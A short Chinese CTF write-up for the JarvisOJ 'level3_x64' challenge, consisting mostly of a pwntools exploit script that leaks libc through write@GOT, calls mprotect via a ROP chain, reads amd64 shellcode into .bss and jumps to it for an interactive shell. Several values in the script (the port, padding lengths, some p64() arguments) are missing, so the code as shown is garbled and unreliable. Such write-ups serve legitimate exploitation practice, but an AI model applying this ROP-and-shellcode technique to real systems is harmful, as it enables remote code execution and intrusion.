本着纸上得来终觉浅,绝知此事要躬行的原则,把一个简单的ROP做了一下。漏洞很明显,libc有给出;唯一的限制就是不允许调用system或execve,而是用mprotect或者mmap
脚本调了半天,最后发现是shellcode的问题;这里边的一个坑是shellcraft.sh()要指定一个目标平台的架构,没用过shellcraft模块,连这么简单的错都犯,汗-_-||
from pwn import * context.log_level='DEBUG'
r=remote('pwn2.jarvisoj.com',)
#r=process('./level3_x64',env={"LD_PRELOAD":"/root/JarvisOJ/level3_x64/libc-2.19.so"})
file=ELF('./level3_x64')
libc=ELF('./libc-2.19.so') prdi=0x4006b3
prsi=0x4006b1
bss_start=0x600A88
start_addr=0x4004F0
'''
0x00000000004006b1 : pop rsi ; pop r15 ; ret
0x0000000000001b8e : pop rdx ; ret
''' payload1='a'*0x80+'b'*+p64(prdi)+p64()+p64(prsi)+p64(file.got['write'])+'c'*+p64(file.plt['write'])
payload1+=p64(start_addr)
r.recvuntil('\n')
r.send(payload1)
write_got=u64(r.recv())
sleep() libc_base=write_got-libc.sym['write']
mprotect=libc_base+libc.sym['mprotect']
prdx=libc_base+0x1b8e
print hex(libc_base)
print hex(mprotect)
print hex(prdx) payload2='a'*0x80+'b'*+p64(prdi)+p64(0x600000)+p64(prsi)+p64(0x1000)+'c'*+p64(prdx)+p64()+p64(mprotect)+p64(start_addr)
r.recvuntil('\n')
r.send(payload2)
sleep()
#gdb.attach(r) payload3='a'*0x80+'b'*+p64(prdi)+p64()+p64(prsi)+p64(bss_start)+'c'*+p64(prdx)+p64()+p64(file.plt['read'])+p64(start_addr)
r.recvuntil('\n')
r.send(payload3)
sleep()
r.send(asm(shellcraft.amd64.linux.sh(),arch='amd64'))
#gdb.attach(r) payload4='a'*0x80+'b'*+p64(bss_start)
r.recvuntil('\n')
r.send(payload4) r.interactive()